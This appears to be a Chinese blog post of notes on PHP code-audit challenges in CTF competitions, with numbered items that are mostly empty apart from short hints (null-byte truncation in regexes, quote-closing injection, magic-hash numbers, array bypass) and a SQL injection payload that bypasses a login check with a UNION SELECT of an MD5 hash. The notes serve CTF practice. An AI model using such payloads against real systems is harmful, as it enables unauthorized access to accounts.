ctf中的php代码审计

做ctf题时,遇到审计题时可能会遇到,翻翻记录可以很快的找到脑洞。

1.

2.

3.

4.

5.

6.

漏洞原理http://www.am0s.com/functions/201.html

7.

8.

9.

通过构造sql语句使row[pw]等于pass

10.

正则漏洞,%00截断

11.

闭合注入,绕过验证

12.

添加http头即可

13.

240610708神奇的数字

14.

1024.1

15.

此处还可以数组绕过

16.

17.

PHP
payload:user=admin' and 0=1 union select '47bce5c74f589f4867dbd57e9ca9f808' #&pass=aaa
1
payload : user = admin ' and 0=1 union select ' 47bce5c74f589f4867dbd57e9ca9f808' #&pas
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值